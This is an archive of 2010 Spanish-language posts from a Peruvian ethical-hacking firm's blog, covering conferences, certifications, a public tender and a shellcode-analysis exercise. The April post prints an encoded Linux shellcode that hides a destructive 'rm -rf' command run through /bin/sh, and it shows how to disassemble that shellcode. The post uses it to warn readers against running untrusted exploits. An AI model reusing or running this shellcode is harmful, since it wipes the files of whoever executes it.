Friday, December 31, 2010

Ultimo post del 2010

Siempre he escuchado gente que pide que el año actual se "vaya" rapido porque les resulto muy malo y esperan que el proximo sea mejor. Yo siempre esperaba que el proximo sea mejor, pero, consideraba que el presente ya habia terminado y nada mas.
Esta vez es diferente, me auno a los que esperan que se VAYA pronto el 2010, fue un año de extremos, mas extremos que los polos norte y sur.

Esto sera un analisis rapido, son 9:26 pm en Lima, Perú...

Tecnicamente, el año fue de lo mejor porque tanto a nivel de equipo como individualmente quede convencido que hay buenas capacidades. Esto suena BIEN "panudo", pero, tuvimos oportunidad de compararnos con colegas en eventos diversos; conocer de las vulnerabilidades mas recientes y entenderlas, pero, mas aun, explicarselas a los demas en charlas y clases; encontrar vulnerabilidad en los servicios de los clientes que otros no encontraron (incluso hubo un caso donde una vulnerabilidad fue divulgada hasta con videos por un "iluminado" y no tenia ni idea hasta donde se podia llegar); modificamos y hackeamos mas toolz que antes (incluso MVelazco desarrollo una nueva y personalmente encontre como pasar por alto las restricciones de una tool de analisis de vulnerabilidad que se esta haciendo mas popular); entrenamos mas de 100 personas en ethical hacking; participamos exitosamente en algunos CtF; en fin, solo puedo pensar en exitos tecnicos.
En el otro extremo y bien relacionado a esto, no consegui que alguien maneje los proyectos en mi lugar y, muy a mi pesar, sigo siendo la cara visible de Open-Sec. Asi no importa que seamos la unica organizacion peruana que tiene 4 hackers de staff y que todos estemos certificados por EC Council y algunos por Offensive Security, GIAC, ISC2, etc. Si los demas no los conocen ni saben de sus certificaciones, es lo mismo que nada.

El desarrollo de la empresa lo resumo en : menos dinero que el año 2009, pero, mejores clientes y de mas renombre.
Una persona me dijo algo : "Lo que la gente ve en Uds. es que son estables a traves de los años". Y es que es bien raro encontrar organizacion que vivan haciendo servicios unicamente y no vendiendo productos y, peor/mejor aun, servicios de ethical hacking.
Pero, se ve que es de extremos ? Poca plata y mejores clientes.
Este año me toco terminar la iniciativa de Ecuador y, sin embargo, llegamos hasta Honduras.
Perú es un medio dificil para hacer negocios de seguridad porque, LAMENTABLEMENTE, aun existen clientes que evaluan subjetivamente basados en cosas el origen extranjero de las empresas, si haces eventos grandes, si les regalan cursos, etc.

En lo familiar, fue lo mismo : pase por la peor de las situaciones en mi vida y al mismo tiempo tengo la mejor familia que alguien pueda desear.
Considero que cada cosa mala da lugar a algo bueno. El problema que afronte me permitio encontrar amigos muy buenos y que incluso me acompañaron en la decision que tome, asi no sea necesariamente lo que ellos harian.

Dado que me propuse no postear cosas personales en este blog, no colocare nombres ni mas detalles y solamente algunas cosas que me vienen a la mente como premisas para el proximo año :
  • Decir la verdad siempre de frente A LA PRIMERA. Mi norma es decir siempre la verdad, pero, muchas veces trato de postergarlo por no aparecer como rebelde o conflictivo. Eso me ha traido incluso reclamos en los ultimos 2 dias por no decir a alguien que solamente queria ayudarlo aunque en realidad no lo necesitaba.
  • Difundir mas los exitos de los peruanos en cuanto foro se pueda dar.
  • Dedicar mas tiempo a mejorar mi estado de salud.
  • Obtener al menos una certificacion de hacking adicional (este año priorize la inversion en las certificaciones de otros, el 2011 es mio!).
  • No participar en eventos donde no haya etica y eso implica no aceptar como sponsors a empresas de dudosa etica.
Finalmente, solo quiero desearle un año 2011 MUY BUENO a cualquiera que lea este post, se amigo, enemigo o lo que sea.

FELIZ 2011 !!!!

Saturday, December 18, 2010

Mea culpa y entrevista en lamula.pe

El jueves participe de LimaHack 2010 y en algun momento de aquellos donde no pude con mi genio, mencione como Operation Payback demostro que para hacer ataques no todo es tema de toolz y que mover a las masas es mejor estrategia.
Incluso, mencione el hecho que en algunos casos no habia que descargar nada sino entrar con el browser, seleccionar el objetivo (de acuerdo a lo que ordenara Anonymous) y listo. Dije tambien que alli habia un buen "chunk" de hexa que era un javascript en base64 (creo que no di tanto detalle) y mencione que eso podia ser cualquier cosa.
Entonces, el MEA CULPA : olvide que yo mismo, dias atras, habia compartido con algunos el hecho que este ataque de DDoS usaba LOIC (tambien se usaron otros similares como HOIC aunque no es tan elaborado y no se encuentran los fuentes a pesar que se anuncia con abierto).
Este LOIC es una tool y por eso el MEA CULPA porque SI hay una TOOL de por medio. En realidad, trate de rescatar el hecho que esta tool permite generar un DDOS con colaboracion voluntaria motivada por la convocatoria por redes sociales (twitter en particular).
Incluso, LOIC tiene un "modo" hivemind que permite entregar la maquina propia a un bot controlado via IRC (al mejor estilo del fenecido proyecto SETI).

Aprovecho este mismo post para comentar sobre una entrevista que nos hizo lamula.pe durante LimaHack 2010 : http://lamula.pe/2010/12/17/hackers-peruanos-wikileaks-julian-assange-lamer-insurance/4042
Hace tiempo que no mencionaba el termino lammer porque ultimamente prefiero llamarlos "iluminados", pero, lo cierto es que me gusto el espacio para desmitificar un poco el asunto.
Por ahi lei un comentario que decia que un hacker no se autocalifica segun Eric Raymond y su definicion de hacker como alguein que investiga profusamente algo y comparte ese conocimiento. Yo mismo durante varios años explique el concepto junto con el glider y decia que un cheff tambien puede ser un hacker en su terreno.
Ja! Pero, hay muchas cosas que no ayudan a explicarse por ser purista y exacto, asi que hacker es un termino referido a hackers de tecnologia, para todo lo demas que vuele la imaginacion.
En lo que si me voy a mantener siempre es que un hacker no debe autocalificarse. Yo soy un hacker etico certificado y lo digo porque tengo la certificacion de C|EH que la emite un tercero (EC Council), pero, tambien soy un Evaluador de Penetraciones Certificado (Certified Penetration Tester suena menos erotico) por GIAC/SANS y es mas o menos lo mismo.
Si no tuviese esas certificaciones diria que soy un hacker ? Seguro que no al igual que siempre aclaro el hecho que no soy ingeniero sino tecnico, asi que, no es un tema de dogmas sino de sinceridad y honestidad con uno mismo.
Claro, si alguien me pregunta si me gusta hackear yo respondere que es lo maximo despues de mi familia. Sexo y musica quedan en la cola al paso de los años.

Monday, November 22, 2010

Tiempos movidos...mucho de todo

Y esa siempre es la razón por la cual es más dificil bloggear en los últmos tiempos, son tiempos movidos donde se hace mucho y de todo.

Las vulnerabilidades siempre parecen ser más de lo mismo y a veces llego a pensar que mi percepción sobre el negocio de los virus y antivirus se da también en las vulnerabilidades. Es dificil aceptar que sigan dandose tantos descuidos en aplicaciones comerciales que tienen grandes inversiones en el desarrollo de software.

Pero, por otro lado, también parece increíble que aún existan aplicaciones hechas a medida que sean tan vulnerables a SQLi, XSS, etc. o que sigan metiendo tanta información en variables de sesión o que consideren que los atacantes nunca querrán vulnerar sus aplicaciones.

Aún en países como el nuestro, el hacker es un ser casi extraterrestre y no se llega a crecer en la misma cantidad de especialistas en hacking que se tiene en otros países. Esto podría paracer bueno para alguien que vive de eso dado que no hay mucha competencia, pero, no es así porque como siempre (pueden ver mis otros posts), el cliente no sabe lo que hay y encima hay mucho charlatan, local y foraneo.

Más allá de todo esto, no hay otra cosa como andar todo el tiempo investigando, analizando lo que pasa con el software, el hardware y la seguridad como un todo. Sí alguien tiene sed de conocimiento, entonces debe practicar el hacking, la medicina y/o la cocina. En todos ellos hay creatividad constante, investigaciones a raudales y una sed de conocimiento satisfecha al vencer retos.

En los últimos meses he visto como personas de Ecuador, Honduras y Perú aprenden técnicas de hacking teoricamente, luego hacen algunas pruebas y cuando son sometidos a retos del mudno real es que realmente empiezan a disfrutarlo. En lo personal, quisiera ver más expertos en hacking en Perú, sean de Open-Sec o no, pero, que se dediquen y que sean responsables por lo que hacen. Que no sean ejecutores de herramientas ni consultores de alto nivel, sino gente que investigue a fondo, que asuma retos y que entregue una buena calidad en cada cosa que ejecute.

Tecnicamente puedo decir que, para varias, los últimos meses han sido de dedicación casi total a MetaSploit con algunas paseadas por NeXpose/Sapyto(bizploit) y una búsqueda constante de una herramienta automatizada para analizar webs que de veras la haga, pero, hasta ahora, la mejor herramienta sigue siendo la revisión "a mano" del los web (claro, usando los queridos NoScript, Agent Switcher, Poster, Tamper Data, Grounspeed, Firebug y Hackbar).

No puedo dejar de comentar en esta especie de catarsis bloggera que estoy haciendo después de mucho tiempo, la noticia del día : Novell fue adquirido por Attachmate. Sabía que hacian emuladores de terminal y nada más. Creo que es la mejor forma de terminar para Novell en las manos de un pequeño desconocido que descuartizado por un gigante aunque el holding que esta detrás de Attachmate es liderado por Microsoft y ya sabemos de donde salió el dinero para esa compra.
Novell se constituyó en una parte muy importante de mi vida, pero, movimientos absurdos como comprar CTP y dejar que sus "ejecutivos" asuman el control de una corporación de tecnología hizo que entre otras cosas despidan a Eric Schmidt, creador del proyecto de Java en Sun y hoy día CEO de Google.

Hasta la proxima!

Saturday, October 02, 2010

Ekoparty 2010

Esta fue una de las aventuras más simpáticas de los últimos tiempos. Ya el año pasado nos quedamos sin ir por la carga laboral y este año nos lanzamos.
Era importante para nosotros ir como team y para ver que tal estamos comparados con un medio tan avanzado y competitivo como el argentino, en otras palabras, que tan "hackers" somos y de hecho, el resultado fue positivo para nosotros, pero, hay que tener en cuenta que en Argentina no solamente hay buenos pen testers, ethical hackers, etc. sino excelentes investigadores y desarrolladores en seguridad informática. Mauricio Velazco se preguntaba : y ellos estan todo el día investigando para encontrar esas vulnerabilidades y desarrollar exploits ? La respuesta es SI porque allá hay empresas que se dedican a desarrollar herramientas de hacking, tanto como software libre como comercial. Ejemplo de todo ello son Core Impact (de Core Security), CANVAS (de Immunity) y la incorporación de w3af al "conglomerado" de Rapid7 que ya cuenta con MetaSploit, así como, Netifera y el ataque de Padding Oracle aplicado a la __viewstate de .Net donde el 50% del mérito lo tiene un argentino, Juliano Rizzo.
Aca nuestra investigación se da en forma posterior porque nos dedicamos a entender las vulnerabilidades reportadas y luego, a comprender como funcionan las herramientas o exploits lanzados, y, en algunos casos, para corregirlos o adecuarlos a nuestras necesidades (aunque ya tenemos 3 nuevas herramientas que lanzaremos este mes en el evento de ISACA el 22 de octubre).
A continuación la aventura Ekoparty en imágenes :
Perú estuve super presente en Ekoparty 2010.
Estuvimos 4 de Open-Sec, Juan Pablo, Felipe y Miguel (más datos omitidos a propósito).






La danza diabólica de las habitaciones compartidas.
Quién duerme con MV ? Por aca! Pero, luego encontró su pareja ideal : MU, durmieron juntos 3 noches y fueron felices por siempre. MV se quedó unos días más en Bs Aires haciendo los trámites del matrimonio.
(El del gesto diabólico no es ninguno de los M*).



Nos mandaron un mail diciendo que lleguemos a las 7:30 am., como buenos peruanos puntuales, llegamos a las 9:00 de la madrugada y quedó claro que argentinos y peruanos somos hermanos, más puntuales imposible!





El escenario de Ekoparty. El lugar donde se realiza es bien particular, hay que tener la mente bien abierta para encontrarle lo simpático, pero, el escenario como tal es buenísimo : un logo de Ekoparty en neón, un panel suficientemente grande, buen audio, una decoración entretenida, muy bueno.



A la izquierda : MV en el CtF. Lo curioso fue que alguien dijo : es un web! MV buscó, lo encontró y empezó a atacarlo. Rato después alguien le dice que era un web que estaba publicado en Internet y los retos eran de esos que solo entienden los creadores y sus amigos. Curiosamente, el web del reto terminó siendo "alterado". Quién habrá sido ?
A la derecha : MU, CC y JQ haciendo lockpicking que luego será aplicado en pruebas de seguridad física.
A la izquierda : seleccionando "exploits".

A la derecha : MU meditando sobre el padding oracle attack...oooommmm...ZZZZZZ




Dicen que la mejor defensa es el ataque, MV lo pone en práctica...



A la izquiera : peruanos en el subte.



A la derecha : reciclador tecnológico.






Monday, May 10, 2010

An score of 98% says that Mauricio Velazco is a Certified Ethical Hacker by EC Council...3 C|EH @ Open-Sec

Para nosotros es un tema bien importante el reconocimiento a quienes demuestran feacientemente su conocimiento y el hecho que Mauricio Velazco haya obtenido el dia de hoy la certificacion de C|EH es muy importante por varias razones :
1. Es el miembro mas joven de nuestro equipo y afaik, es el C|EH mas joven en Perú con 24 años.
2. Ya lleva cerca de 2 años haciendo unicamente ehtical hacking y computación forense y el puntaje obtenido en el examen demuestra que su experiencia ayudo mucho para el examen (no llevo un curso o similar).
3. Open-Sec resulta siendo la unica empresa local que cuenta con 3 C|EH en staff permanente.
4. Este es solamente el inicio de una saga de certificaciones que obtendra Mauricio, hoy conversabamos sobre la proxima, CPTE.

FELICITACIONES MAURICIO!!!

UPDATE : El día de ayer también obtuvo su certificación como C|EH el consultor Rolando Antón. El no es parte del equipo de Open-Sec, es parte del equipo de Etel Perú, pero, es un gran Amigo nuestro y mio en particular.

Dado que hoy día Mauricio Velazco cumplió 25 años, desde hoy hasta octubre de este año, Rolando es el C|EH peruano más joven (AFAIK).

FELICITACIONES ROLANDO!!!!

Wednesday, April 07, 2010

Pago por ver: Qué hace este shellcode ?

Hace unos días le paso algo a un amigo y un post de HD Moore sobre las cosas "ocultas" en los shellcode me hicieron pensar en postear algo al respecto y que sea técnico para que este blog no se muera.
Lo que me terminó de convencer fue que en una lista de gente certificada alguien consulto sobre un error que le aparecia al compilar un exploit que se bajo de exploit-db. Facil : queria compilar un programa en C para MS Windows en Linux.
Dado que este blog no es educativo, solamente me limitare a decir que hay demasiada informacion en Internet sobre exploits, hay que saber programar para usarlos (si no, troyano para adentro o cualquier cosa similar y/o peor).
Asi que dicho eso, para jugar con los exploits y shellcodes se requiere tener skills y experiencia de desarrollador, principalmente en C (pero, no es lo único) y en Assembler.
Si tengo un shellcode entre manos :
1. Lo paso a algo que pueda entender : ensamblador.
2. "des-ensamblo" el codigo para revisar que hace el programa.
3. Puedo generar el binario ejecutable, correrlo en una maquina virtual de scratch y bajo la "supervision" de un trazador (strace por ejemplo).

Los puntos 1 y 2 se pueden hacer con (no son las unicas formas) :
A. Un script donde se pega la porcion del shellcode y se obtiene un binario (no ejecutable, solo objeto) :
#/usr/bin/ruby
myfile = File.new("shellcode.bin", "w")
shellcode = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"+
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"+
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"+
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"+
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"+
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"+
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
myfile.write(shellcode)
myfile.close

B. Luego, a leer el shellcode en ensamblador :
ndisasm -b 32 shellcode.bin

El resto, para un proximo post mientras los que no sabian estas cosas repasan su ensamblador.

Wednesday, February 03, 2010

Discusion sobre requisitos para hacer un Ethical Hacking

No habia querido postear sobre este tema porque cada que posteo algo no tecnico me siento MAS viejo y porque aun no se daban analisis y conclusiones mas alla de mis (nuestras) opiones y convicciones, pero, tambien de algunos hechos reales.

Ahora que ya todo es informacion publica y esta oleado y sacramentado, si me decidi a compartir este hecho : se aperturo un concurso de contratacion para un servicio de ethical hacking en una entidad del Estado Peruano y las bases fueron observadas por un postor en 3 aspectos.

A continuacion la reproduccion de los requerimientos, las observaciones y mis opiniones :

1. Se solicitaba :

"Copias simples de las certificaciones relativas a seguridad informática (cada uno de los consultores deberá contar con un mínimo de 01 certificación), la certificación deberá tener una antigüedad no menor a seis (06) meses. No se aceptarán certificaciones emitidas por fabricantes de hardware y/o software.
La omisión de alguno de los documentos enunciados acarreará la descalificación de la propuesta.
7 PERSONAL A CARGO DEL SERVICIO
Todos los consultores deberán contar con mínimo una (01) certificación relativa a seguridad informática, las certificaciones deberán tener una antigüedad no menor a 6 meses, no se aceptarán certificaciones emitidas por fabricantes de hardware y/o software."

La observacion presentada indica :

"En estos puntos observamos que solicitar certificados con antigüedad no menor a seis meses es limitante y restrictivo, está dirigido a que exista un único postor con consultor que tiene ese tipo de certificado con ese intervalo de tiempo. Con este requisito innecesario no podré participar en este concurso público y supongo que muchos postores también, por lo expuesto solicito retirar estos requisitos innecesarios y restrictivos."

Lo curioso de esto es que hubiese sido bueno tener la fuente de tal informacion estadistica porque dentro de lo que yo conozco existen por lo menos 4 C|EH en Perú que si cumplen con tener mucho mas antiguedad con su certificacion que 6 meses.
Por ello, esa observacion, cuando menos, me parece que muestra desconocimiento del mercado local de ethical hacking.

2. Se solicitaba :

"El Consultor Principal del equipo de consultores deberá contar con una certificación correspondiente a labores de hackeo ético en modalidad de ataque, es decir, certificaciones como Certified Ethical Hacker, EcCouncil Certified Security Analyst, Licensed Penetration Tester, OSSTMM Professional Security Analyst, OSSTMM Professional Security Tester, Certified Pen Testing Specialist, Certified Pen Testing Expert, GIAC Penetration Tester y/o Offensive Security Certified Professional. No se aceptarán certificaciones relativas a seguridad de la información, forensia ni relativas a productos en defensa o análisis de intrusiones."

La observacion presentada por el mismo postor indica :

"Observamos que según la Ley de Contrataciones y Adquisiciones del Estado prohíbe la referencia a marcas o nombres comerciales, patentes, diseños o tipos particulares, por lo expuesto solicitamos retirar los nombres de estas certificaciones mencionadas por estar transgrediendo la Ley."

Esto me parece parcialmente correcto. Es decir, la Ley mencionada indica exactamente eso, pero, la referencia es para compras de activos, principalmente, ya que no se puede pedir comprar un equipo marca ACME en las primeras compras. Esto es igual absurdo porque al revisar las especificaciones tecnicas, resulta que casi siempre, solo el equipo ACME cumple.

Pero, no es correcto del todo porque al indicar "certificaciones como" se da cabida a las mencionadas y otras mas para que no ocurra que algun postor se aproveche (como ya ha ocurrido muchas veces) y presente consultores con certificaciones genericas de seguridad (como GSEC) o de analisis de intrusiones (que implica conocer como se produjo un ataque, pero, no certifica el conocer como hacerlo, esto pasa en SANS/GIAC donde hay certificaciones diferentes como GCIH y GPEN, respectivamente).
Otra cosa que ocurre es que presentan o piden certificaciones como CISSP, CISA o CISM como si estas fueran referencias a conocer como realizar un ethical hacking.

3. Se solicita :

"Para la calificación en este factor, el postor deberá presentar el plan de trabajo detallado en los términos de referencial los cuales se deben ser precisados, éste contendrá la metodología OSSTMM , el cronograma usando las herramientas gantt, el equipamiento e infraestructura que se utilizará durante todas las pruebas, la descripción de las actividades así como la lista y descripción de las herramientas.

La asignación de puntaje será de acuerdo al siguiente criterio:

Presenta Plan de Trabajo detallado completo 25 puntos
No presenta plan de Trabajo completo 00 puntos"

El mismo postor plantea la siguiente observacion :

"Observamos que la solicitud de la presentación de un plan de trabajo para la calificación es muy ambigua, solicitamos eliminar este requisito por ser ambiguo en su calificación y se presta a favorecer a un determinado portor con una calificación subjetiva y no cuantitativa o en tal caso solicitamos nos alcancen el detalle completo del contenido del Plan de Trabajo indicando cuanto vale cada parte del plan de trabajo para que llegue a sumar los 25 puntos. Tenemos derecho a conocer a que las calificaciones sean precisas y no ambiguas por ser un Concurso Público."

Esto si es sumamente preocupamente porque el postor indica que la calificacion es ambigua. El tema es bien simple : te dicen que debe contener el plan de trabajo, preparalo, presentalo y listo, tienes el puntaje. Ahi no dice que se daran mas o menos puntos por el mejor o peor plan de trabajo y encima solicitan mas detalle.

Dado que no quedaron conformes con la respuesta de la entidad, pidieron que el titular de la misma se manifieste al respecto (el Ministro) y recibieron tambien el rechazo a las mismas aunque incluyeron una precision respecto a que las certificaciones mencionadas son solo un ejemplo y que de presentar otras similares, pero, no mencionadas, seran aceptadas.

Luego de conocer las observaciones planteadas me anime a participar dado que cumplimos perfectamente con los requisitos y, obviamente, el postor que interpuso las observaciones desistio de participar. Corrimos solos y ganamos porque cumplimos con los requerimientos e incluso otros mas complejos.

El parrafo anterior es unicamente una muestra de la transparencia de este hecho, al menos de mi parte, ya que me llamo mucho la atencion encontrar un proceso similar en el cual este postor gano con unos requerimientos mas particulares aun (el jefe de equipo tenia que tener las certificaciones de CISM, CISSP y GCIH para obtener el maximo puntaje en un factor especifico) y donde tambien se calificaba el plan de trabajo (se indicaba puntaje por cada punto del mismo, pero, igual, no habia calificacion por mejor o peor plan que es lo que si haria que sea ambigua).

Como dato anecdotico, la seccion donde se describen los alcances, la descripcion y entregables del servicio fueron tomadas de documentos creados por nosotros y que siempre los hemos compartido de forma abierta, asi que probablemente llegaron a manos de la entidad que convoco y los uso.

- Nuestro mercado peruano carece de una gran cantidad de profesionales certificados en seguridad como encontramos en otros paises cercanos y, mas aun, en temas de ethical hacking.

Incluso certificaciones base como GSEC son presentadas como demostracion del conocimiento y experiencia en ethical hacking cuando solo certifican conocimientos basicos de seguridad.

El hecho concreto es que en nuestro pais contamos con por lo menos 6 C|EH y 2 GPEN, casi todos trabajan en proveedores y por ello, si se deben exigir certificaciones similares. No menciono otras como OCSP, OSCE, OPST, OPSA, CPTS, etc. porque hasta donde he visto y conozco, solo Andres Morales las tiene aca.

- Es valido encontrar empresas que empiezan a ganar experiencia en consultorias de seguridad de la informacion, auditorias, etc., pero, no es valido permitir que se conviertan en buscadores de oportunidades sin considerar que podrian hacer que nuestro mercado no suba de nivel.

Si subcontratan consultores o realizan alianzas para obtener negocios y aun asi no cumplen con los requerimientos, ya lo haran en tiempos posteriores.

El siguiente nivel de exigencia deberia ser demostrar que las certificaciones aun estan vigentes. Vemos constantemente que hay personas que se presentan con certificaciones que ya las perdieron por no renovarlas y certificaciones que ya no existen. Incluso, si recuerdan, impugnamos un concurso donde gano una empresa con base en el extranjero que presento un consultor con un certificado adulterado.

Las certificaciones de seguridad requieren ser revalidadas continuamente mediante la obtencion de creditos por actividades o retomando los examenes.

- La respuesta del titular de la entidad sento precendete administrativo porque hubiese sido bien grave que las observaciones sean admitidas ya que se habria generado una especie de jurisprudencia para que no se exija antiguedad en las certificaciones, certificaciones acordes al objeto de la convocatoria y que los planes de trabajo no sean calificados.

- Los que se dedican a consultoria de seguridad deben invertir en su mejor herramienta : los consultores. Es decir, deberian invertir en certificarlos.

Hace unas semanas publicaron un articulo mio en America Sistemas donde planteaba la idea de tener una suerte de cyberteam en Perú y, claro, convocado por el Estado. En esta oportunidad, planteo que el Estado deberia definir unos terminos de referencia base para contrataciones de servicios de ethical hacking o similares y que sean desarrollados despues de sostener reuniones con los proveedores locales para que guarde coherencia y vigencia.

Saludos!

Thursday, January 07, 2010

Nombre Comercial: PEPITA

Yo creo que algun error en el sistema porque no puede ser el nombre comercial de una persona natural que hace consultoria en seguridad directamente o por su empresa...
O tal vez se motivaron con la publicidad de Creatividad de Inca Kola...jejeje